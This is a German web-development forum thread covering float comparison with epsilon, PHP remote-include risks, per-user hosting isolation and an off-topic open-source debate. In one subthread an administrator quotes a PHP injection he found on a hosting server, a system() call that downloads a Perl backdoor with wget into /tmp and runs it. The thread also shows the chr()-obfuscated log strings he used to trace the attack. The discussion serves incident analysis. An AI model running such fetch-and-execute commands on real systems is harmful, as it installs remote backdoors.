                                ε ist dabei die Toleranz-Grenze. Und wenn ε kleiner Null ist, hätte man eine
                                Genauigkeit besser als 100%... *g*

                                再见,
                                克里斯蒂安

                                --
                                Q: God, root, what's the difference?
                                A: God is merciful.
                                http://wwwtech.de/
                                1. Hi,

                                  Zwei Zahlen sind gleich, wenn |(a-b)| < ε
                                  ε ist dabei die Toleranz-Grenze. Und wenn ε kleiner Null ist, hätte man eine
                                  Genauigkeit besser als 100%... *g*

                                  Nein, eine Ungleichung, die für alle Werte von a und b immer unwahr ist, da der Betrag |x| für jedes x per Definition immer größer als oder gleich Null ist, also niemals kleiner als eine Zahl sein kann, die kleiner als Null sein soll.

                                  cu,
                                  Andreas

                                  --
                                  Warum nennt sich Andreas hier MudGuard?
                                  Schreinerei Waechter
                                  Fachfragen per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
                                  1. 你好 MudGuard,

                                    Zwei Zahlen sind gleich, wenn |(a-b)| < ε
                                    ε ist dabei die Toleranz-Grenze. Und wenn ε kleiner Null ist, hätte man
                                    eine Genauigkeit besser als 100%... *g*

                                    Nein, eine Ungleichung, die für alle Werte von a und b immer unwahr ist, da
                                    der Betrag |x| für jedes x per Definition immer größer als oder gleich Null
                                    ist, also niemals kleiner als eine Zahl sein kann, die kleiner als Null
                                    sein soll.

                                    Jupp, das ist ein anderer Aspekt. Ich finde aber die Genauigkeit > 100%
                                    lustiger ;-)

                                    再见,
                                    克里斯蒂安

                                    --
                                    Mensch zu Mathematiker: "Ich finde Ihre Arbeit ziemlich monoton". Mathematiker: "Mag sein! Dafür ist sie aber stetig und unbeschränkt."
                                    http://wwwtech.de/
                                2. n'Abend!

                                  Mit ε (Epsilon) wird die Genauigkeits-Differenz bezeichnet.

                                  Ach so. Diese spezielle Bedeutung von ε war mir bisher nicht geläufig. Ich konnte es nur als eine willkürlich gewählte Unbekannte einordnen, die genausogut u oder σ hätte heißen können.
                                  Danke für den Tip. :)

                                  Du weisst ja, dass Fliesskommazahlen bei Computern gemäß ihrer Natur nur begrenzt genau sind. Deshalb macht man seltenst Vergleiche über ==, sondern etwa so...

                                  Ja, das ist mir nur zu gut vertraut; ich habe sogar selbst schon Fließkomma-Arithmetik in Assembler auf einem µC programmiert.

                                  Und wenn ε kleiner Null ist, hätte man eine Genauigkeit besser als 100%... *g*

                                  Das erinnert mich jetzt irgendwie an eine Mathestunde in der Oberstufe. Vektorrechnung, Gleichung eines Kreises bzw. einer Kugel. Durch ein Versehen unseres Lehrers beim Zusammenstellen der Übungsaufgaben ergab sich bei der Rechnung ein negativer Kugelradius.
                                  Schüler: So'n Quatsch, was soll denn das sein, eine Kugel mit negativem Radius!
                                  Lehrer, schlagfertig: Das müssen Sie sich so vorstellen, als sei die Kugel einfach nach innen gestülpt, wie wenn Sie Ihr T-Shirt auf links ziehen!  *g*

                                  Bis denne,

                                  Martin

                      2. 你好 Andreas,

                        am sichersten wäre es eh, wenn man für jeden Benutzer eine eigene
                        Apache-Instanz in einem BSD-Jail oder einen Linux-chroot aufsetzt, die nur
                        intern auf Port <irgendwas> lauschen. Die Requests leitet man dann z. B. per
                        Squid an den richtigen internen Port weiter. So kann quasi nichts
                        passieren, selbst wenn ein Kunde gehackt wird ;-)

                        再见,
                        克里斯蒂安

                        --
                        Der Verstand steht ueber allem. Was durch die Vorstellungskraft nicht geschaffen werden kann, existiert nicht.
                        http://wwwtech.de/
                        1. Hallo Christian!

                          am sichersten wäre es eh, wenn man für jeden Benutzer eine eigene
                          Apache-Instanz in einem BSD-Jail oder einen Linux-chroot aufsetzt, die nur
                          intern auf Port <irgendwas> lauschen.

                          abgesehen von http://www.google.com/search?q=How+to+break+out+of+a+chroot+jail - ja (also FreeBSD Jail oder Linux mit grsec), aber das wollte ich dann nicht warten müssen ;-)

                          Die Requests leitet man dann z. B. per
                          Squid an den richtigen internen Port weiter. So kann quasi nichts
                          passieren, selbst wenn ein Kunde gehackt wird ;-)

                          Aber da die großen Provider IMHO gut damit fahren ein einfaches System streng zu konfigurieren, würde ich eher diesen Weg gehen wollen.

                          Wenn ein Kunde die Möglichkeit hat Passwort-Datein für andere nicht sichtbar zu speichern, ist er selbst Schuld wenn er das nicht macht. Von der Konfiguration sollte das System nur so ausgelegt sein, dass wenn ein Angreifer irgendeinen Account knackt, also entsprechende User-Rechte hat, dass er an dieser Stelle nicht weiter kommen darf, also auch keine anderen Accounts (mit ordentlichen Rechten) verändern/lesen können darf. Dasselbe gilt natürlich noch viel mehr für Daten bzgl. Administration, da lassen manche ja auch schonmal das root-passwort für MySQL mehr oder weniger öffentlich rumliegen, z.B. in confixx oder in irgendeinem "unwichtigen" Backup...

                          Grüße
                          Andreas

                          --
                          SELFHTML Linkverzeichnis: http://aktuell.de.selfhtml.org/links/
                2. hi,

                  Hauptverursacher ist eine konzeptionelle Schwäche in PHP. [...]
                  Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.

                  ich denke gerade das entspricht dem konzept von unix/linux, _alles_ als ... wie heißt das noch, resource ist sicher der falsche begriff, zu betrachten - egal ob file oder remote?

                  gruß,
                  wahsaga

                  --
                  /voodoo.css:
                  #GeorgeWBush { position:absolute; bottom:-6ft; }
                  1. 你好 wahsaga,

                    Hauptverursacher ist eine konzeptionelle Schwäche in PHP. [...]
                    Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.

                    ich denke gerade das entspricht dem konzept von unix/linux, _alles_
                    als ... wie heißt das noch, resource ist sicher der falsche begriff, zu
                    betrachten - egal ob file oder remote?

                    So stimmt das nicht.

                    Das Konzept von Unix ist: alles im Lokalen System ist eine Datei.
                    Netzwerk-Verbindungen und ähnliches werden jedoch (aus bekannten Gründen)
                    extra behandelt.

                    Ist die Verbindung erstmal hergestellt, wird das Handle wieder wie eine
                    Datei behandelt, das ist allerdings wahr und auch gut so.

                    Wenn es dich interessiert kann ich dir den “Advanced Programming in the
                    Unix(tm) Environment” empfehlen.

                    再见,
                    克里斯蒂安

                    --
                    Auf der ganzen Welt gibt es nichts Weicheres und Schwaecheres als Wasser. Doch in der Art, wie es dem Harten zusetzt, kommt nichts ihm gleich.
                    http://wwwtech.de/
                    1. hi,

                      So stimmt das nicht.

                      Das Konzept von Unix ist: alles im Lokalen System ist eine Datei.
                      Netzwerk-Verbindungen und ähnliches werden jedoch (aus bekannten Gründen)
                      extra behandelt.

                      dann hatte ich da wohl etwas nicht ganz zutreffendes im hinterkopf.

                      Ist die Verbindung erstmal hergestellt, wird das Handle wieder wie eine
                      Datei behandelt, das ist allerdings wahr und auch gut so.

                      hm, dann war's vielleicht eher das, was ich meinte.

                      ja, das scheint auch der bessere weg zu sein, als automatisch die verbindung herzustellen, wenn versucht wird remote auf etwas zuzugreifen.
                      dass man anschließend das lesen aus/schreiben in dieses handle analog wie beim dateizugriff behandelt, ist allerdings praktisch.

                      Wenn es dich interessiert kann ich dir den “Advanced Programming in the
                      Unix(tm) Environment” empfehlen.

                      danke, aber derzeit nicht :-)

                      gruß,
                      wahsaga

                      --
                      /voodoo.css:
                      #GeorgeWBush { position:absolute; bottom:-6ft; }
                      1. 你好 wahsaga,

                        ja, das scheint auch der bessere weg zu sein, als automatisch die
                        verbindung herzustellen, wenn versucht wird remote auf etwas zuzugreifen.

                        Sagichdoch ;-))

                        dass man anschließend das lesen aus/schreiben in dieses handle analog wie
                        beim dateizugriff behandelt, ist allerdings praktisch.

                        Ja, und das ist auch gewollt so. So kann man grosse Code-Teile problemlos
                        umlenken auf lokale Dateien oder Netzwerk-Verbindungen.

                        再见,
                        克里斯蒂安

                        --
                        Das Sein entsteht aus dem Nicht-Sein.
                        http://wwwtech.de/
              2. Hallo Christian!

                Gäbe es Extra-Funktionen für den Zugriff auf
                externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme
                gleich erschlagen.

                Ich hoffe sehr, dass es PECL::HTTP noch in PHP 5.1 schafft (beta soll AFAIK heute kommen), das wäre mal sehr viel eleganter als diese nervige Geschichte mit fsockopen(): http://dev.iworks.at/ext-http/http-functions.html.gz

                Hm, blöderweise ist PHP mit der Zeit derart mit Extensions aufgebläht worden, dass sie jetzt sehr rigeros Extensions aus dem core rausschmeißen, und nur noch sehr wenige neue Extensions aufnehmen. IMHO wäre hier eine HTTP-Extension ein wirklich guter Kanditat, weil genau sowas fehlt (das merkt man ja auch an den vielen Fragen bzgl. HTTP-Requests... z.B. hier im Forum). Entsprechend soll die HTTP-Extension aus PECL leider auch nicht aufgenommen werden (Antwort von Derick Rethans auf php.internals), was ich ehrlich gesagt nicht richtig finde. Denn wenn diese Extension in PECL liegt, wird sie doch niemals Beachtung finden und verwendet werden (im Gegensatz zu so wirklich speziellen Sachen wie xdebug, bcompiler...).

                Wenn also Du oder jemand anders noch ein gutes Argument kennt... ;-)

                Viele Grüße
                Andreas

                PS: Dein Argument "wären die meisten Probleme gleich erschlagen" ist ja eigentlich kein richtiges Argument, weil man die Leute nur mit einem BC-Bruch dazu zwingen könnte, und auch heute könnte man an Stelle von include() ja wenigstens mal readfile() verwenden - wenn man keinen PHP-Code ausführen will. Macht aber auch kaum jemand.

                --
                SELFHTML Linkverzeichnis: http://aktuell.de.selfhtml.org/links/
          2. Sup!

            Hauptverursacher ist IMHO der User mit dem Buggy Script.

            Aber das es sich um PHP-Programmierer handelt kann man nicht mehr vom Nutzer erwarten. Darum sollten eigentlich alle Funktionen abgestellt werden.

            Gruesse,

            Bio

            --
            Never give up, never surrender!!!
  2. Hallo!

    Hintergrund der Sache: es hat jemand geschafft, auf bastet.occuris.de Code
    über eine solche Software einzuschleusen:

    system("uname -a");
    system("cd /tmp;wget http://http://geocities.yahoo.com.br/netbrdial/bd.pl;cd /tmp;perl bd.pl");

    Fragt mich nicht, über welche Sicherheitslücke er das geschafft hat,

    Hast Du mal die Apache-Logs durchsucht?

    grep wget /var/log/apache/*

    (zufällig awstat öffentlich zugänglich installiert?)

    Grüße
    Andreas

    --
    SELFHTML Tipps & Tricks: http://aktuell.de.selfhtml.org/tippstricks/
    1. 你好 Andreas,

      Hast Du mal die Apache-Logs durchsucht?

      Natürlich.

      grep wget /var/log/apache/*

      Das bringt nichts. So blöd sind die Jungs ja nun nicht. Da wird mit chr() und
      ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen
      gefunden.

      (zufällig awstat öffentlich zugänglich installiert?)

      Nö.

      再见,
      克里斯蒂安

      --
      So, wie ein Teil ist, ist das Ganze.
      http://wwwtech.de/
      1. Hallo,

        Das bringt nichts. So blöd sind die Jungs ja nun nicht. Da wird mit chr() und
        ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen
        gefunden.

        Mich wurde mal interesieren was dann mit dem passiert. Machst du da nee Anzeige oder redest du mit dem nur?

        Gruß Klaus

        1. 你好 Klaus,

          Mich wurde mal interesieren was dann mit dem passiert. Machst du da nee
          Anzeige oder redest du mit dem nur?

          Den Fritzen, der den Code eingeschleust hat? Ne, das bringt nichts, der kommt
          irgendwo aus Russland, Brasilien oder sonstwoher.

          Den Typen, der die Software nicht aktualisiert hat? Was bringts den
          anzuzeigen? Das ist höchstens fahrlässig, sicher nicht böswillig. Ich
          bezweifle, dass er sich darüber bewusst war, was für Konsequenzen das haben
          kann.

          再见,
          克里斯蒂安

          --
          Die Wirklichkeit hat weder ein Inneres, noch ein Äußeres, noch ein Zentrum.
          http://wwwtech.de/
        2. Moin,

          Hallo,

          Das bringt nichts. So blöd sind die Jungs ja nun nicht. Da wird mit chr() und
          ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen
          gefunden.

          Mich wurde mal interesieren was dann mit dem passiert. Machst du da nee Anzeige oder redest du mit dem nur?

          Der Schuldige, vermute ich, ist ein unbedarfter User, der irgendein buggy Script zum Einsatz gebracht hat.
          Derjenige, der das Teil auf den Server bugsiert hat, der sitzt irgendwo in Timbuktu, den bekommt so oder so nicht.
          Was würdest Du tun?

          TomIRL

          1. ! Ollah

            Was spricht den gegen eine Anzeige? Das ist immerhin böswilliger/vorsätzlicher Code... Evtl. hat er selbe schon merhmals den gleichen Mist gemacht und ist schon bekannt....

            Greets

            1. 你好 Fabienne,

              Was spricht den gegen eine Anzeige? Das ist immerhin
              böswilliger/vorsätzlicher Code... Evtl. hat er selbe schon merhmals den
              gleichen Mist gemacht und ist schon bekannt....

              Versuch mal jemanden wegen einer solchen Lapallie ausserhalb des EU-Raums zu
              fassen zu kriegen, z. B. wie in diesem Fall in Brasilien.

              再见,
              克里斯蒂安

              --
              Coincidence?! I THINK NOT!!
              http://wwwtech.de/
      2. Hallo!

        Hast Du mal die Apache-Logs durchsucht?

        Natürlich.

        Dumme Frage im nachhinein ;-)

        grep wget /var/log/apache/*

        Das bringt nichts. So blöd sind die Jungs ja nun nicht.

        Oh doch, Deine vielleicht nicht, aber man liest es doch immer wieder...

        Da wird mit chr() und
        ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen
        gefunden.

        und wie wenn ich fragen darf? (wo hast Du wonach gesucht?)

        Viele Grüße
        Andreas

        --
        SELFHTML Linkverzeichnis: http://aktuell.de.selfhtml.org/links/
        1. 你好 Andreas,

          grep wget /var/log/apache/*

          Das bringt nichts. So blöd sind die Jungs ja nun nicht.

          Oh doch, Deine vielleicht nicht, aber man liest es doch immer wieder...

          Hehe ;-)

          Da wird mit chr() und
          ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen
          gefunden.

          und wie wenn ich fragen darf? (wo hast Du wonach gesucht?)

          Erst nach

          %252echr(115)%252e%252echr(121)%252e%252echr(115)%252e%252echr(116)%252e%252echr(101)%252e%252echr(109)%252e

          gesucht (system), dann in den Ergebnissen nach der URL gesucht:

          chr(103)%252echr(101)%252echr(111)%252echr(99)%252echr(105)%252echr(116)%252echr(105)%252echr(101)%252echr(115)

          Dann geguckt, ob die Software anfällig ist. Und “schon” hatte ich den
          Schuldigen.

          再见,
          克里斯蒂安

          --
          Die Summe zweier gerade Primzahlen ist immer eine Quadratzahl.
          http://wwwtech.de/
        2. 你好 Andreas,

          das lustige an der Aktion war: dadurch, dass der Prozess mit “perl ... %”
          gestartet wurde, war der Prozess ein Kind-Prozess des Apache und hat seine
          Sockets geerbt, inkl. des Sockets, der auf Port 80 lauscht und des Sockets,
          der auf Port 443 lauscht. Und dadurch, dass er sich aus der Prozessgruppe
          gelöst hat (fork() mit setsid()) wurde er vom nächtlichen Logrotate nicht
          betroffen. Das hat dazu geführt, dass auf Port 80 und Port 443 auch noch
          ein Prozess lauschte, als der Apache sich beendet hat. Dadurch konnte der
          Apache durch das logrotate-Script nicht neu gestartet werden. Das war
          letztenendes das, woran ich es heute morgen sofort gemerkt hatte ;-)

          再见,
          克里斯蒂安

          --
          Denn wer 'ne Blacklist hat, muss halt daran denken, dass er manches nicht sieht... und vor dem posten die Realitaet einschalten
          http://wwwtech.de/
          1. Hallo Christian!

            Das war
            letztenendes das, woran ich es heute morgen sofort gemerkt hatte ;-)

            Das wäre auch meine nächste Frage gewesen ;-)

            Wundert mich allerdings dass das so funktioniert?! Ich vermute mal, dass Du entsprechend mod_php einsetzt. Angenommen man verwendet (wie ich es eigentlich eher empfehlen würde) CGI mit suphp, so dass der CGI-Prozess immer unter der UID des Anwenders läuft, dann wäre das wohl nicht passiert (mit dem fehlgeschlagenen restart). Wie merkt man sowas am einfachsten, ohne jetzt ein dickes IDS-Geschütz aufzufahren? Am besten wohl durch regelmäßiger Port-Scans von außerhalb, oder?

            Grüße
            Andreas

            --
            SELFHTML Tipps & Tricks: http://aktuell.de.selfhtml.org/tippstricks/
            1. 你好 Andreas,

              Angenommen man verwendet (wie ich es eigentlich eher empfehlen würde) CGI
              mit suphp, so dass der CGI-Prozess immer unter der UID des Anwenders läuft,
              dann wäre das wohl nicht passiert (mit dem fehlgeschlagenen restart).

              Vermutlich nicht. Bei suexec wird ja nicht fork() benutzt, um die Binary
              letztenendes zu starten, das Environment wird also nicht vererbt.

              Wie merkt man sowas am einfachsten, ohne jetzt ein dickes IDS-Geschütz
              aufzufahren? Am besten wohl durch regelmäßiger Port-Scans von außerhalb,
              oder?

              Portscans und Aufmerksamkeit, ja. Regelmäßig halt die Prozessliste anschauen
              und so.

              再见,
              克里斯蒂安

              --
              Sei ε kleiner Null.
              http://wwwtech.de/
      3. Hi,

        Ich habe inzwischen aber den Schuldigen
        gefunden.

        die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, sicherlich auch im os-Kontext. Eine Eigenschaft des rein ehrenamtlichen Tuns ist sicherlich u.a. die nur ungenuegend vorhandene Moeglichkeit konditionierend einzuwirken (und von wem auch und warum? ;-).

        Und nicht nur so etwas moechte ich "frickeln" nennen; gut gemeint, "doofes Brot" dazwischen, Konsequenzen ((das stoerungsverursachende Subjekt betreffend) oft unmoeglich) unabsehbar bzw. unrealisierbar.

        Dennoch, mir ist die Wikipedia bereits mehrfach positiv "aufgestossen", wie funktioniert denn sowas halbwegs zuverlaessig? Wird da die Geschwaetzigkeit bestimmter wertvoller Nutzer augenutzt oder ist der Erfolg etwa "systemimmanent"?

        Gruss,
        Ludger

        --
        "Frickelt rugig weiter!"
        1. Hi Ludger

          die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, sicherlich auch im os-Kontext. Eine Eigenschaft des rein ehrenamtlichen Tuns ist sicherlich u.a. die nur ungenuegend vorhandene Moeglichkeit konditionierend einzuwirken (und von wem auch und warum? ;-).

          *prust* Ich finde das gerade sehr witzig. Was bitte hat occuris mit ehrenamtlicher Tätigkeit zu tun? Ich würde Nachlesen empfehlen, bevor du Allgemeinplätze erzählst.

          Gruss Daniela

          1. Hi,

            die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, sicherlich auch im os-Kontext. Eine Eigenschaft des rein ehrenamtlichen Tuns ist sicherlich u.a. die nur ungenuegend vorhandene Moeglichkeit konditionierend einzuwirken (und von wem auch und warum? ;-).

            *prust* Ich finde das gerade sehr witzig. Was bitte hat occuris mit ehrenamtlicher Tätigkeit zu tun? Ich würde Nachlesen empfehlen, bevor du Allgemeinplätze erzählst.

            das sollte auch witzig sein.   :-)

            Ich kenne die Bearbeitungsweisen fachlicher Probleme hinreichend aus dem ehrenamtlichen "sozialen" Kontext und stelle da in aller Regel Sozialverhalten "niederer Kasten" (Mobbing, Antipathien, Irrationalitaet, fehlende hierarchische Strukturen und die Unmoeglichkeit "den Richtigen" entscheiden zu lassen fest) bzw. im geschaeftlichen Umfeld tendentiell zielfuehrendes, aber zugegebenermassen auch nicht "hochintelligentes" Sozial- und Entscheidungverhalten fest.

            Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird. Ists frickeln oder ist da mehr? Und warum scheint die Wikipedia zu funktionieren?

            Gruss,
            Ludger

            --
            "Nach der naechsten bundesdeutschen Wahl gibt es ein Problem weniger."
            1. Hi Ludger

              Du hast _nichts_ verstanden. Occuris ist eine Firma, sie hat _nichts_ mit ehrenamtlicher Tätigkeit zu tun.

              Gruss Daniela

              1. Hi,

                Du hast _nichts_ verstanden. Occuris ist eine Firma, sie hat _nichts_ mit ehrenamtlicher Tätigkeit zu tun.

                ach so, ich habs vergessen, Du spielst ja immer die formale Karte. Nun, wenn open source basierte software kostenfrei ist, dann haben Abnehmer dieser die in meinen Postings weiter oben genannten Probleme.

                Wirklich wahr, da kann man nicht einfach sagen, open source "ist wie normale software", ist es naemlich definiv nicht (wenn _DER_MEISTER_ meine postings noch lesen wuerde! ;-). Der den ueblichen Konventionen widersprechenden "Nicht-Verguetungsgedanke" kann m.E. auch nicht dadurch begruendet und gerechtfertigt werden, dass die Verguetung ggf. spaeter und ggf. indirekt erfolgt. (Auch, wenn es da Teilerfolge gibt, aber warum gibt es diese ueberhaupt?)

                Gruss,
                Ludger

                --
                "Frickelt ruhig weiter!"
                1. Hi Ludger,

                  Du hast _nichts_ verstanden. Occuris ist eine Firma, sie hat _nichts_ mit ehrenamtlicher Tätigkeit zu tun.
                  ach so, ich habs vergessen, Du spielst ja immer die formale Karte. Nun, wenn open source basierte software...

                  Webhosting, nicht Software. Mein Gott, bist Du merkbefreit...

                  wenn _DER_MEISTER_ meine postings noch lesen wuerde! ;-)

                  würde er sehen, dass Du Dir nicht die geringste Mühe gibst, die Argumente Deines Gesprächspartners auch nur wahrzunehmen, sondern zuverlässig irgendeinen der Schubladentexte absonderst.

                  Viele Grüße
                  Mathias Bigge

            2. Hallo,

              Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird. Ists frickeln oder ist da mehr? Und warum scheint die Wikipedia zu funktionieren?

              Wenn man glaubt, die Wikipedia würde funktionieren, hat man höchstwahrscheinlich einfach nicht genau hingeschaut. Äußerlichen Schein produziert vor allem die technisch-formale Ordnung. Es wird unendlich viel Engagement investiert, das Formale zu wahren und durchzusetzen. Schaut man unter diese vermeintlich wohlgeordnete Oberfläche, findet man eben vornehmlich Irrationalität und für vernünftige Arbeit unergiebige Strukturen.

              Mathias

              1. Hi,

                Wenn man glaubt, die Wikipedia würde funktionieren, hat man höchstwahrscheinlich einfach nicht genau hingeschaut. Äußerlichen Schein produziert vor allem die technisch-formale Ordnung. Es wird unendlich viel Engagement investiert, das Formale zu wahren und durchzusetzen. Schaut man unter diese vermeintlich wohlgeordnete Oberfläche, findet man eben vornehmlich Irrationalität und für vernünftige Arbeit unergiebige Strukturen.

                na gut, aber es scheint ein m.E. mit unserem politischen demokratischen System ("D") vergleichbarer Erfolg vorhanden zu sein. Was mir erst einmal reichen wuerde. "king of the hill" sollte ja auch keiner werden, so ohne weiteres.

                Gruss,
                Ludger

              2. Hallo.

                Äußerlichen Schein produziert vor allem die technisch-formale Ordnung. Es wird unendlich viel Engagement investiert, das Formale zu wahren und durchzusetzen. Schaut man unter diese vermeintlich wohlgeordnete Oberfläche, findet man eben vornehmlich Irrationalität und für vernünftige Arbeit unergiebige Strukturen.

                Das beschriebene Phänomen nennt sich "Demokratie" und kennt diese Nebenwirkungen seit Jahr und Tag in all seinen Facetten.
                MfG, at

            3. Hallo Ludger,

              Ich kenne die Bearbeitungsweisen fachlicher Probleme hinreichend aus dem ehrenamtlichen "sozialen" Kontext

              Tatsächlich? In welcher Form?

              und stelle da in aller Regel Sozialverhalten "niederer Kasten" (Mobbing, Antipathien, Irrationalitaet,

              Interessant, bring doch bitte Beispiele.

              fehlende hierarchische Strukturen

              Fehlen sie tatsächlich? Oder nur dir? Die Devs beispielsweise arbeiten in uneingeschränkter Anarchie.

              und die Unmoeglichkeit "den Richtigen" entscheiden zu lassen fest)

              Wer etwas umsetzt, hat Recht.

              Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird.

              Eigenverantwortlich.

              Ists frickeln oder ist da mehr?

              Keine Ahnung, was soll „frickeln“ aussagen?

              Grüße
              Roland

              1. Hi,

                Ich kenne die Bearbeitungsweisen fachlicher Probleme hinreichend aus dem ehrenamtlichen "sozialen" Kontext

                Tatsächlich? In welcher Form?

                Du warst doch vielleicht auch schon mal in einem Verein? Da passieren doch Sachen, die sind irrational. Und warum sollte man da nicht verallgemeinern?

                und stelle da in aller Regel Sozialverhalten "niederer Kasten" (Mobbing, Antipathien, Irrationalitaet,

                Interessant, bring doch bitte Beispiele.

                Ich hatte kuerzlich Kontakt mit einem von der oesterreichischen osCommerce community. Der wollte eine bestimmte Funktionalitaet, die ich als XML-basierten webservice bereitgestellt habe als osCommerce contribution veroeffentlichen. Nur - man lausche - den Mann schien es nicht sonderlich zu interessieren, ob das, was er entwickelt auch laeuft und natuerlich war seine "Verpackung" sehr buggy. Das war irrational.
                Dann gibt es so open source Sachen wie bspw. SOAP::Lite, das bei groesseren und komplexen XML Dokumenten bei der Ausgabe datenverlustig wird. Ist moeglicherweise ein Ein-Mann Projekt.
                Mobbing und Antipathien moechte ich nicht belegen, beides ist aber typisch im ehrenamtlichen Bereich. (BTW - ich fuehle mich hier relativ oft unnoetig unfreundlich angegangen, oft von dem- oder denselben.)

                fehlende hierarchische Strukturen

                Fehlen sie tatsächlich? Oder nur dir? Die Devs beispielsweise arbeiten in uneingeschränkter Anarchie.

                Aber es gibt _den_ Chefentwickler. Ausserdem gibt es eine, ich sage mal politisch (im uebrtragenden Sinn) aehnliche Ausrichtung, die die Leute zusammenhalten laesst.
                Ich bin davon ueberzeugt, dass Hierarchien absolut erforderlich sind. BTW - die Devs sind doch auch hierarchisch aufgestellt, es gibt doch eine Aufgabenverteilung mit Schwerpunkten (Das ist auch eine Hierarchie, aber wenns hart auf hart kommt, fehlt der Entscheider.). Aber, um Missverstaendnissen vorzubeugen, ich habe und hatte nicht vor die Devs zu kritisieren, mir ging es um open source und community im Vergleich zur Wirtschaft (auch da wird gefrickelt, aber die Organisationsform produziert bessere Ergebnisse.)

                und die Unmoeglichkeit "den Richtigen" entscheiden zu lassen fest)

                Wer etwas umsetzt, hat Recht.

                Wer erfolgreich umsetzt scheint recht zu haben. Ich weiss aber nicht genau, ob das stimmt. Es ist naemlich nicht nur wichtig, dass es "funzt", sondern dass das bereitgestellte System auch weiterentwicklungsfaehig, wartungsfreundlich und skalierbar ist.

                Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird.

                Eigenverantwortlich.

                ;-)

                Ists frickeln oder ist da mehr?

                Keine Ahnung, was soll „frickeln“ aussagen?

                Ich weiss auch nicht was frickeln ist. Ich habe das Wort aufgegriffen, weil es lustig ist und anschienend hier tabuisiert. Was ich persoenlich mit frickeln meine ist das Zusammenfriemeln (Kodieren) bestimmter nicht so relevanter Funktionalitaeten, also bspw. von UIs. Aber da kann man anderer Meinung sein, kein Problem.   :-)

                Gruss,
                Ludger

                1. Hallo Ludger,

                  Du warst doch vielleicht auch schon mal in einem Verein?

                  Ja.

                  Da passieren doch Sachen, die sind irrational.

                  Hm, mir fällt leider kein Beispiel ein, das ich hier nennen möchte. ;-)

                  Natürlich „menschelt“ es auch in einem Verein, so wie eben in jeder zwischenmenschlichen Beziehung. Diesen Umstand begründen jedoch weder die Rechtsform noch die Ausrichtung.

                  Und warum sollte man da nicht verallgemeinern?

                  Weil das eine verkürzte Sichtweise impliziert? Verallgemeinerungen sind bequem, aber oberflächlich. Und das wollen wir schließlich nicht sein.

                  Mobbing, Antipathien, Irrationalitaet,

                  Ich hatte kuerzlich Kontakt mit einem von der oesterreichischen osCommerce community. Der wollte eine bestimmte Funktionalitaet, die ich als XML-basierten webservice bereitgestellt habe als osCommerce contribution veroeffentlichen.

                  Das war natürlich bereits ein Fehler. ;-)

                  Nur - man lausche - den Mann schien es nicht sonderlich zu interessieren, ob das, was er entwickelt auch laeuft und natuerlich war seine "Verpackung" sehr buggy. Das war irrational.

                  Warum war das irrational? Womöglich war ihm das Ergebnis egal, weil er innerlich bereits gekündigt hatte, ihn das Thema nicht interessierte, usw. usf. Was stand darüber im Vertrag (Pflichten- bzw. Lastenheft) und was hat dieses bemitleidenswerte Einzelschicksal mit OS zu tun?

                  Dann gibt es so open source Sachen wie bspw. SOAP::Lite, das bei groesseren und komplexen XML Dokumenten bei der Ausgabe datenverlustig wird. Ist moeglicherweise ein Ein-Mann Projekt.

                  http://soaplite.com/team.html

                  Du und deine Vorurteile … Die Qualität einer Software hat mit deren Lizenz nichts zu tun.

                  Mobbing und Antipathien moechte ich nicht belegen, beides ist aber typisch im ehrenamtlichen Bereich.

                  Ohne Belege ist das nur eine Behauptung. Ich behaupte das Gegenteil.

                  (BTW - ich fuehle mich hier relativ oft unnoetig unfreundlich angegangen, oft von dem- oder denselben.)

                  What goes around comes around, dude. ;-)

                  fehlende hierarchische Strukturen

                  Die Devs beispielsweise arbeiten in uneingeschränkter Anarchie.

                  Aber es gibt _den_ Chefentwickler.

                  Nein. Niemand hat das Sagen, es sei denn, es handelt sich um ein externes Projekt, das zur Verfügung gestellt wird. Und selbst dann werden Wünsche nicht durchgedrückt. Das hat auch etwas mit der Wertschätzung geleisteter Arbeit zu tun.

                  Ausserdem gibt es eine, ich sage mal politisch (im uebrtragenden Sinn) aehnliche Ausrichtung, die die Leute zusammenhalten laesst.

                  Im Großen und Ganzen kann ich dir da nur zustimmen. Unterschiedliche Auffassungen treten meist erst bei Detailfragen zutage.

                  die Devs sind doch auch hierarchisch aufgestellt,

                  Nein. An http://aktuell.de.selfhtml.org/people/devs.htm#wer solltest du dich nicht orientieren, diese Aufstellung ist äußerst unscharf und gibt nur einen allgemeinen Überblick.

                  Interessant ist in diesem Zusammenhang, dass selbst bei der Arbeit an SELFHTML 8.1, für die sich eine bunte Truppe aus Devs und Nicht-Devs zusammengefunden hatte und trotz des gewaltigen Arbeitspensums und des selbstauferlegten Drucks nie eine übergeordnete Instanz notwendig war. Ich hatte meine Zweifel, dass das Projekt so gut funktionieren würde. Aber so war es und das ist ein geiles Gefühl.

                  es gibt doch eine Aufgabenverteilung mit Schwerpunkten (Das ist auch eine Hierarchie, aber wenns hart auf hart kommt, fehlt der Entscheider.).

                  Die Aufgabenverteilung orientiert sich an den fachlichen Interessen der Mitwirkenden und an deren verfügbarer Freizeit. Nicht so bei allgemeinen Entscheidungen, da wird kreuz und quer diskutiert und schlussendlich ein breiter Konsens angestrebt. Einstimmige Beschlüsse sind sogar relativ selten, irgendwer muss immer dagegen sein und wird anschließend verprügelt. ;-) Ein Entscheider hätte mit dem Problem zu kämpfen, die Hälfte der Mannschaft gegen sich zu haben und das wäre wahrlich kein Spaß.

                  Aber, um Missverstaendnissen vorzubeugen, ich habe und hatte nicht vor die Devs zu kritisieren,

                  Damit hätte ich kein Problem. Ein Werk, das nicht kritisiert wird, ist keines.

